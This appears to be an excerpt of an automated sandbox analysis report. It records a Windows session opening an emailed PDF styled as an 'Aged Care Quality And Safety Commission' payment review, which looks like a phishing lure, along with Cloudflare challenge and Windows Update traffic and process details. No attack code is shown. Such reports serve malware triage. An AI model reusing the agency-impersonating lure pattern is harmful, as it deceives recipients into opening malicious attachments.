                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:06 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/888a0b630ed98c1b/1716519723558/wlYn9sv82zuVieG HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:06 UTC200INHTTP/1.1 200 OK
                                                                    Date: Fri, 24 May 2024 03:02:06 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 61
                                                                    Connection: close
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b819be37cf9-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-05-24 03:02:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4c 00 00 00 5f 08 02 00 00 00 cd b7 b6 49 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                    Data Ascii: PNGIHDRL_IIDAT$IENDB`


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.1649739104.17.2.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:06 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/204239232:1716516640:z1Q-82SQEC5453QrRVJiA-W088EwWom7wzPnNIq-U9k/888a0b630ed98c1b/0cc0942b0c543ec HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 30165
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    Content-type: application/x-www-form-urlencoded
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    CF-Challenge: 0cc0942b0c543ec
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Origin: https://challenges.cloudflare.com
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normal
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:06 UTC16384OUTData Raw: 76 5f 38 38 38 61 30 62 36 33 30 65 64 39 38 63 31 62 3d 6d 52 79 56 51 6e 78 44 77 6e 77 35 79 6e 53 33 6b 35 79 56 78 76 45 48 61 78 53 78 72 33 63 33 53 77 6e 31 33 62 33 6e 79 33 31 33 4f 6e 33 34 41 56 34 71 33 6a 56 33 52 34 6e 33 57 56 78 4d 41 56 78 67 33 6b 76 78 42 78 6a 33 34 72 25 32 62 33 43 77 6e 66 46 44 41 33 74 33 71 37 30 34 50 33 44 4d 75 41 30 33 75 56 6e 44 51 34 56 2d 2d 68 2b 70 41 34 76 77 6c 6f 56 6e 58 33 54 56 35 2d 6b 38 71 6b 33 33 53 58 33 6d 77 56 33 6d 70 79 33 57 34 41 33 7a 64 45 2d 33 4b 30 6e 33 77 41 33 42 75 42 6e 44 58 79 6a 77 50 79 33 75 79 7a 6e 6d 64 43 34 4d 2d 41 78 51 43 73 49 69 7a 30 33 6d 44 55 76 33 41 30 61 37 2d 77 78 47 33 34 6d 4a 70 4b 2d 44 4d 42 62 6e 52 77 78 6d 44 71 71 37 55 77 46 59 5a 54 2b 6e
                                                                    Data Ascii: v_888a0b630ed98c1b=mRyVQnxDwnw5ynS3k5yVxvEHaxSxr3c3Swn13b3ny313On34AV4q3jV3R4n3WVxMAVxg3kvxBxj34r%2b3CwnfFDA3t3q704P3DMuA03uVnDQ4V--h+pA4vwloVnX3TV5-k8qk33SX3mwV3mpy3W4A3zdE-3K0n3wA3BuBnDXyjwPy3uyznmdC4M-AxQCsIiz03mDUv3A0a7-wxG34mJpK-DMBbnRwxmDqq7UwFYZT+n
                                                                    2024-05-24 03:02:06 UTC13781OUTData Raw: 33 75 4a 6a 33 35 33 67 30 45 41 6e 36 58 30 33 68 33 53 33 2d 68 43 4c 33 58 33 6d 33 68 56 6e 6c 6c 50 33 24 56 45 70 78 78 33 24 6f 6e 70 33 70 33 72 41 34 33 6e 5a 33 24 4c 6e 61 33 77 33 45 56 35 61 33 51 33 58 30 45 53 78 54 30 43 30 43 33 76 54 39 55 37 4b 42 33 41 33 43 4d 45 53 33 68 33 53 75 37 76 33 78 33 75 56 35 4b 78 56 70 73 69 30 77 33 72 33 55 52 6e 48 33 38 33 46 41 35 54 78 45 41 35 56 43 42 30 61 7a 6c 44 6e 52 78 35 48 49 79 2d 44 33 52 58 75 56 33 6e 37 55 62 75 4c 45 63 48 59 33 52 79 6e 48 33 6b 33 68 33 2d 4a 78 4f 30 2d 56 33 70 33 71 41 34 56 78 52 33 2b 33 6c 61 2d 64 78 64 56 69 31 2d 64 78 56 70 76 30 45 44 33 7a 41 76 30 35 71 47 35 68 2d 36 2d 41 78 57 41 4c 2b 78 76 78 66 30 2d 56 2d 5a 6c 30 56 33 6b 35 50 78 69 33 64 33
                                                                    Data Ascii: 3uJj353g0EAn6X03h3S3-hCL3X3m3hVnllP3$VEpxx3$onp3p3rA43nZ3$Lna3w3EV5a3Q3X0ESxT0C0C3vT9U7KB3A3CMES3h3Su7v3x3uV5KxVpsi0w3r3URnH383FA5TxEA5VCB0azlDnRx5HIy-D3RXuV3n7UbuLEcHY3RynH3k3h3-JxO0-V3p3qA4VxR3+3la-dxdVi1-dxVpv0ED3zAv05qG5h-6-AxWAL+xvxf0-V-Zl0V3k5Pxi3d3
                                                                    2024-05-24 03:02:06 UTC322INHTTP/1.1 200 OK
                                                                    Date: Fri, 24 May 2024 03:02:06 GMT
                                                                    Content-Type: text/plain; charset=UTF-8
                                                                    Content-Length: 22200
                                                                    Connection: close
                                                                    cf-chl-gen: fq8262kPLUaA6qjQgsvINz0qpJ8RTCJ4oY170xKoiN+8nKWCvxoKMQAPdm7cRuFo$wiMTxMadZ7yNNa6+46YwKg==
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b82d9d31a28-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-05-24 03:02:06 UTC1047INData Raw: 71 6f 36 38 73 5a 32 6e 71 4a 6d 7a 70 4a 71 62 76 62 79 79 6b 6f 65 56 70 4a 57 47 70 4c 71 5a 69 71 65 4f 72 70 36 73 6f 38 79 58 74 72 69 55 71 62 53 30 7a 4c 61 75 6f 4c 4f 35 76 4c 43 79 76 4f 72 48 77 4d 66 4c 79 4d 37 4a 76 76 48 52 77 4e 58 4b 78 66 61 7a 36 2b 58 63 7a 65 6a 52 41 62 2f 34 7a 65 66 5a 38 77 44 6e 41 4f 72 61 36 67 4c 4d 37 2b 33 68 39 51 6b 54 41 63 6f 4d 2b 4e 6b 56 46 42 7a 65 38 74 6b 44 33 52 6a 79 39 2f 7a 66 42 2f 67 63 43 52 62 67 44 41 6b 6b 36 77 30 6a 44 77 49 54 4c 7a 45 48 4c 68 6b 59 43 69 38 68 46 68 51 30 49 66 34 52 52 7a 63 65 48 44 70 48 51 52 78 41 4f 7a 41 67 51 55 67 68 4b 43 35 50 55 43 77 32 52 7a 67 70 58 7a 6b 38 4c 32 51 32 55 6c 31 46 61 46 4d 6a 59 31 78 4a 51 6d 68 69 61 32 39 42 53 48 4a 6d 64 6a 68
                                                                    Data Ascii: qo68sZ2nqJmzpJqbvbyykoeVpJWGpLqZiqeOrp6so8yXtriUqbS0zLauoLO5vLCyvOrHwMfLyM7JvvHRwNXKxfaz6+XczejRAb/4zefZ8wDnAOra6gLM7+3h9QkTAcoM+NkVFBze8tkD3Rjy9/zfB/gcCRbgDAkk6w0jDwITLzEHLhkYCi8hFhQ0If4RRzceHDpHQRxAOzAgQUghKC5PUCw2RzgpXzk8L2Q2Ul1FaFMjY1xJQmhia29BSHJmdjh
                                                                    2024-05-24 03:02:06 UTC1369INData Raw: 4b 78 4d 47 39 6f 61 57 51 7a 71 69 77 79 62 65 73 75 64 48 50 73 64 2b 33 32 62 50 54 76 64 6e 63 6f 4b 66 61 70 39 72 59 78 72 2f 4a 35 63 2f 53 35 2b 50 71 39 65 54 57 39 65 4b 79 30 4f 79 77 74 76 63 41 31 75 2f 4e 33 66 58 69 39 4d 62 55 2b 66 33 48 2f 76 30 41 34 77 4c 4b 41 4f 59 47 45 67 76 71 46 74 62 37 36 67 34 61 43 76 45 53 48 68 63 6e 47 77 44 79 38 68 59 69 47 76 73 6d 36 79 6f 62 43 79 51 4e 4c 6a 44 70 39 51 34 31 46 6a 67 79 4b 69 73 37 2b 45 4d 58 51 41 4d 41 51 52 63 30 50 67 6f 45 4e 67 39 4c 4d 6b 41 6e 53 30 52 43 4e 54 6c 44 56 31 45 57 46 43 31 56 4f 46 68 63 50 7a 46 61 48 54 39 58 4d 79 70 5a 53 44 6f 74 58 43 35 47 53 55 68 41 56 47 70 43 5a 6a 55 31 64 6d 51 37 66 30 31 32 66 47 4a 4d 56 6c 46 55 56 56 69 4b 63 6c 64 64 66 47
                                                                    Data Ascii: KxMG9oaWQzqiwybesudHPsd+32bPTvdncoKfap9rYxr/J5c/S5+Pq9eTW9eKy0OywtvcA1u/N3fXi9MbU+f3H/v0A4wLKAOYGEgvqFtb76g4aCvESHhcnGwDy8hYiGvsm6yobCyQNLjDp9Q41FjgyKis7+EMXQAMAQRc0PgoENg9LMkAnS0RCNTlDV1EWFC1VOFhcPzFaHT9XMypZSDotXC5GSUhAVGpCZjU1dmQ7f012fGJMVlFUVViKclddfG
                                                                    2024-05-24 03:02:06 UTC1369INData Raw: 30 72 65 77 72 73 36 74 71 63 7a 56 30 62 36 32 31 4e 4c 67 73 65 4f 32 34 4d 62 48 73 74 58 67 78 37 62 44 71 73 58 4e 76 4d 53 30 35 37 2f 31 7a 2b 7a 51 78 38 6a 6e 39 74 6e 30 41 75 2f 41 41 74 6e 30 34 63 4c 35 79 50 54 65 42 4e 76 36 36 77 55 54 33 50 45 4a 37 50 6a 55 46 65 6f 54 39 52 50 6f 32 64 34 4d 41 64 76 7a 48 42 50 6f 2b 51 4c 39 35 51 45 77 4d 42 38 69 37 4f 6b 54 38 69 67 56 45 78 6a 78 47 2f 6f 51 48 54 41 61 49 43 49 65 51 54 48 2b 52 30 6f 6f 52 43 30 38 53 55 45 4a 4c 43 4a 50 52 6b 31 58 53 30 34 6e 55 55 68 63 4c 7a 41 70 48 45 49 37 4f 7a 30 69 4d 32 59 69 56 7a 35 63 56 47 70 4f 50 6d 41 38 5a 53 78 56 58 58 56 57 53 54 64 73 5a 48 52 39 58 46 6c 32 62 6b 78 6a 65 30 56 2b 63 59 41 37 69 33 57 47 53 58 70 6a 58 6b 32 46 58 31 46
                                                                    Data Ascii: 0rewrs6tqczV0b621NLgseO24MbHstXgx7bDqsXNvMS057/1z+zQx8jn9tn0Au/AAtn04cL5yPTeBNv66wUT3PEJ7PjUFeoT9RPo2d4MAdvzHBPo+QL95QEwMB8i7OkT8igVExjxG/oQHTAaICIeQTH+R0ooRC08SUEJLCJPRk1XS04nUUhcLzApHEI7Oz0iM2YiVz5cVGpOPmA8ZSxVXXVWSTdsZHR9XFl2bkxje0V+cYA7i3WGSXpjXk2FX1F
                                                                    2024-05-24 03:02:06 UTC1369INData Raw: 74 69 75 7a 38 6d 61 75 4b 33 4f 7a 37 65 6d 32 37 75 70 33 4e 50 56 75 73 37 4f 72 4d 76 63 76 72 7a 41 39 2b 54 4d 36 72 62 6f 38 4c 7a 76 2b 2f 33 65 32 39 7a 37 42 64 2f 39 2b 4d 4c 32 79 66 37 63 43 74 34 49 32 2b 67 43 42 4f 73 42 44 41 76 32 31 52 77 55 46 76 34 67 46 68 6b 4c 44 50 63 59 48 78 67 63 48 43 49 62 41 79 4c 2b 4d 41 51 70 46 41 59 49 4c 53 34 77 4c 43 77 78 50 42 41 34 47 42 73 36 47 68 63 51 4d 79 62 39 47 78 34 43 4b 2f 30 35 4b 6a 34 4e 55 53 55 6b 55 55 46 43 49 42 68 50 52 46 59 39 52 6a 45 58 51 52 78 62 47 7a 6b 6b 52 44 64 59 4e 57 56 49 49 31 6b 33 59 48 41 75 63 45 4a 66 63 6b 31 6d 63 57 70 43 56 56 6c 76 4f 33 31 59 66 46 5a 33 51 49 42 44 56 6f 52 54 58 55 4e 72 57 45 5a 34 57 58 78 67 57 32 6c 6a 6b 6d 43 43 65 59 52 30
                                                                    Data Ascii: tiuz8mauK3Oz7em27up3NPVus7OrMvcvrzA9+TM6rbo8Lzv+/3e29z7Bd/9+ML2yf7cCt4I2+gCBOsBDAv21RwUFv4gFhkLDPcYHxgcHCIbAyL+MAQpFAYILS4wLCwxPBA4GBs6GhcQMyb9Gx4CK/05Kj4NUSUkUUFCIBhPRFY9RjEXQRxbGzkkRDdYNWVII1k3YHAucEJfck1mcWpCVVlvO31YfFZ3QIBDVoRTXUNrWEZ4WXxgW2ljkmCCeYR0
                                                                    2024-05-24 03:02:06 UTC1369INData Raw: 48 55 76 4a 37 56 74 4e 4c 55 76 4f 61 6b 32 37 37 58 75 63 32 77 35 64 2f 75 7a 39 50 77 32 74 58 76 31 76 4b 32 7a 75 6a 42 7a 41 48 32 76 2f 4c 61 38 73 6e 37 35 66 63 4f 31 2b 66 6b 7a 41 41 56 38 4e 2f 49 41 66 6a 52 47 50 59 50 36 64 7a 5a 47 76 34 42 47 78 77 66 33 68 77 61 39 66 33 35 4b 75 59 48 4a 69 30 79 4a 52 55 4f 44 66 34 77 44 51 49 51 44 77 6a 32 46 52 4d 4b 2f 67 38 56 4d 7a 46 44 50 41 45 31 46 45 4d 48 4f 79 6b 62 55 55 31 44 42 68 31 53 4b 79 30 34 46 6c 5a 54 4b 6b 68 55 58 44 70 65 58 44 46 47 4f 46 63 34 4f 6c 70 67 4a 45 6c 6f 49 56 74 46 62 56 4a 6a 55 44 5a 4c 4d 57 70 52 65 6c 42 73 64 33 68 37 66 48 31 36 67 33 5a 2f 57 6d 5a 47 68 56 78 49 64 30 35 6f 6b 49 2b 4f 58 34 35 75 54 47 2b 4e 68 6e 53 4f 61 58 6c 6f 6e 49 74 79 6f
                                                                    Data Ascii: HUvJ7VtNLUvOak277Xuc2w5d/uz9Pw2tXv1vK2zujBzAH2v/La8sn75fcO1+fkzAAV8N/IAfjRGPYP6dzZGv4BGxwf3hwa9f35KuYHJi0yJRUODf4wDQIQDwj2FRMK/g8VMzFDPAE1FEMHOykbUU1DBh1SKy04FlZTKkhUXDpeXDFGOFc4OlpgJEloIVtFbVJjUDZLMWpRelBsd3h7fH16g3Z/WmZGhVxId05okI+OX45uTG+NhnSOaXlonItyo
                                                                    2024-05-24 03:02:06 UTC1369INData Raw: 63 76 4f 50 4c 35 4f 6a 66 32 75 57 76 34 39 4c 6f 73 75 50 73 37 62 66 72 31 72 50 63 2f 4f 69 39 33 4e 48 4f 74 2f 44 69 78 50 76 72 32 65 55 41 37 39 33 70 35 2f 73 49 41 41 77 47 37 66 67 44 2b 51 6e 56 36 52 50 39 47 66 72 75 33 41 38 47 33 76 59 68 43 75 50 36 47 69 6f 43 41 69 34 77 36 51 72 7a 45 2f 4d 69 4c 44 6a 34 4e 79 34 76 49 42 63 73 49 53 4d 30 42 55 51 7a 2f 54 55 69 42 67 59 65 49 55 6f 48 4f 30 74 46 50 42 41 6b 4d 41 35 4e 4c 44 74 56 58 6a 34 57 58 31 39 67 48 43 51 58 54 69 55 67 58 46 68 67 4c 47 68 6e 51 6d 63 6f 62 31 4e 6e 55 46 46 72 52 6e 6c 30 4e 45 68 36 61 6e 78 5a 55 6a 6c 78 58 56 64 5a 63 31 39 6e 52 6b 74 66 69 32 68 71 54 30 68 4b 66 59 5a 64 68 49 74 51 65 47 61 52 56 49 78 6d 6d 6e 69 4a 63 32 78 62 64 57 36 53 6c 5a
                                                                    Data Ascii: cvOPL5Ojf2uWv49LosuPs7bfr1rPc/Oi93NHOt/DixPvr2eUA793p5/sIAAwG7fgD+QnV6RP9Gfru3A8G3vYhCuP6GioCAi4w6QrzE/MiLDj4Ny4vIBcsISM0BUQz/TUiBgYeIUoHO0tFPBAkMA5NLDtVXj4WX19gHCQXTiUgXFhgLGhnQmcob1NnUFFrRnl0NEh6anxZUjlxXVdZc19nRktfi2hqT0hKfYZdhItQeGaRVIxmmniJc2xbdW6SlZ
                                                                    2024-05-24 03:02:06 UTC1369INData Raw: 7a 75 4f 75 7a 63 33 6e 36 75 37 74 34 63 6a 59 38 4e 32 37 32 65 6e 70 30 4e 44 38 34 73 48 2b 35 51 44 72 42 4f 6f 45 78 75 77 50 37 75 49 51 35 77 6e 50 31 4f 73 4b 31 75 6b 4b 46 41 41 51 44 66 37 30 44 41 49 63 48 2f 6b 42 42 2b 4d 4e 43 67 73 69 47 78 6f 71 45 41 6b 4c 4c 42 55 4e 46 78 6a 7a 4b 78 6f 65 4d 6a 38 71 4f 42 2f 31 4d 44 59 2f 47 53 45 6d 42 45 4d 73 52 69 38 38 4a 7a 77 6b 54 44 31 4b 54 69 34 35 54 56 4a 49 4f 6c 4a 41 4c 6b 78 57 57 6a 49 2f 57 46 35 47 52 6c 30 38 53 6b 70 69 5a 69 6c 52 5a 6c 52 53 54 32 70 49 5a 46 6c 74 58 46 5a 6c 63 32 42 77 57 33 55 2f 66 47 5a 36 61 46 70 6e 66 56 78 38 65 49 43 47 5a 6e 6d 45 69 6d 4a 78 69 6f 35 75 65 59 39 38 6c 48 75 53 67 47 35 37 6c 58 53 59 66 35 69 65 6d 4a 53 64 5a 34 71 4c 6f 6f 43
                                                                    Data Ascii: zuOuzc3n6u7t4cjY8N272enp0ND84sH+5QDrBOoExuwP7uIQ5wnP1OsK1ukKFAAQDf70DAIcH/kBB+MNCgsiGxoqEAkLLBUNFxjzKxoeMj8qOB/1MDY/GSEmBEMsRi88JzwkTD1KTi45TVJIOlJALkxWWjI/WF5GRl08SkpiZilRZlRST2pIZFltXFZlc2BwW3U/fGZ6aFpnfVx8eICGZnmEimJxio5ueY98lHuSgG57lXSYf5iemJSdZ4qLooC
                                                                    2024-05-24 03:02:06 UTC1369INData Raw: 65 76 59 37 63 76 56 33 66 48 50 75 4f 44 31 2b 65 48 68 2b 66 33 33 35 66 7a 47 35 65 67 44 37 77 6a 78 42 67 6f 45 37 67 72 33 39 66 63 4e 2b 77 67 49 45 64 72 35 2f 42 62 7a 41 76 30 61 43 41 49 45 48 65 62 6b 46 53 49 41 47 41 73 6b 46 41 59 56 4b 69 34 77 45 79 38 63 4b 42 67 79 49 44 51 61 4e 66 34 77 48 7a 6b 44 4a 6a 51 39 51 6a 67 6d 51 53 42 41 4c 6b 51 50 52 44 4e 4c 4f 46 41 33 54 54 78 55 4f 6c 46 57 4d 6b 42 56 48 30 56 68 57 30 64 47 50 31 70 65 56 30 78 57 59 6b 4a 67 5a 43 39 53 5a 57 74 58 59 47 52 6f 4e 30 56 55 61 45 39 34 56 48 49 2f 62 47 35 35 66 6d 47 46 5a 57 74 4a 64 59 46 4c 58 6e 71 47 69 6f 52 71 68 33 69 45 64 6f 2b 52 6c 4a 47 53 63 49 79 4d 66 56 31 75 6c 4a 61 66 63 6f 53 64 69 36 69 41 6f 4b 61 73 6b 4b 52 75 62 59 71 70
                                                                    Data Ascii: evY7cvV3fHPuOD1+eHh+f335fzG5egD7wjxBgoE7gr39fcN+wgIEdr5/BbzAv0aCAIEHebkFSIAGAskFAYVKi4wEy8cKBgyIDQaNf4wHzkDJjQ9QjgmQSBALkQPRDNLOFA3TTxUOlFWMkBVH0VhW0dGP1peV0xWYkJgZC9SZWtXYGRoN0VUaE94VHI/bG55fmGFZWtJdYFLXnqGioRqh3iEdo+RlJGScIyMfV1ulJafcoSdi6iAoKaskKRubYqp


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.1649740104.17.3.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:07 UTC486OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/204239232:1716516640:z1Q-82SQEC5453QrRVJiA-W088EwWom7wzPnNIq-U9k/888a0b630ed98c1b/0cc0942b0c543ec HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:07 UTC375INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 24 May 2024 03:02:07 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 7
                                                                    Connection: close
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    cf-chl-out: gDYWyF7yG3zXn4eFqimepA==$VAT5llEi7HxqSG5+0KB+fw==
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b88da911921-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-05-24 03:02:07 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                    Data Ascii: invalid


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.164974140.127.169.103443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:25 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OaGPxhBvLP17mF5&MD=VFhxtCam HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                    Host: slscr.update.microsoft.com
                                                                    2024-05-24 03:02:26 UTC560INHTTP/1.1 200 OK
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    Content-Type: application/octet-stream
                                                                    Expires: -1
                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                    ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_1440"
                                                                    MS-CorrelationId: 5383ce62-b68c-42f8-a5cc-5a90ba0c0135
                                                                    MS-RequestId: cee64dcf-59c0-4cad-93c0-5dbe02874b45
                                                                    MS-CV: Rxiu+zg1Xkm8sBfz.0
                                                                    X-Microsoft-SLSClientCache: 1440
                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                    X-Content-Type-Options: nosniff
                                                                    Date: Fri, 24 May 2024 03:02:25 GMT
                                                                    Connection: close
                                                                    Content-Length: 25457
                                                                    2024-05-24 03:02:26 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                    Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                    2024-05-24 03:02:26 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                    Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:23:01:35
                                                                    Start date:23/05/2024
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                    Imagebase:0x7ff619840000
                                                                    File size:71'680 bytes
                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:23:01:48
                                                                    Start date:23/05/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Temp1_attach_request_478000006439785.zip\Aged Care Quality And Safety Commission_Payment Review#0772-.pdf"
                                                                    Imagebase:0x7ff7b9d20000
                                                                    File size:5'641'176 bytes
                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:5
                                                                    Start time:23:01:49
                                                                    Start date:23/05/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                    Imagebase:0x7ff777c40000
                                                                    File size:3'581'912 bytes
                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:7
                                                                    Start time:23:01:50
                                                                    Start date:23/05/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1608 --field-trial-handle=1596,i,10741502747019713544,8790984211731808162,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                    Imagebase:0x7ff777c40000
                                                                    File size:3'581'912 bytes
                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
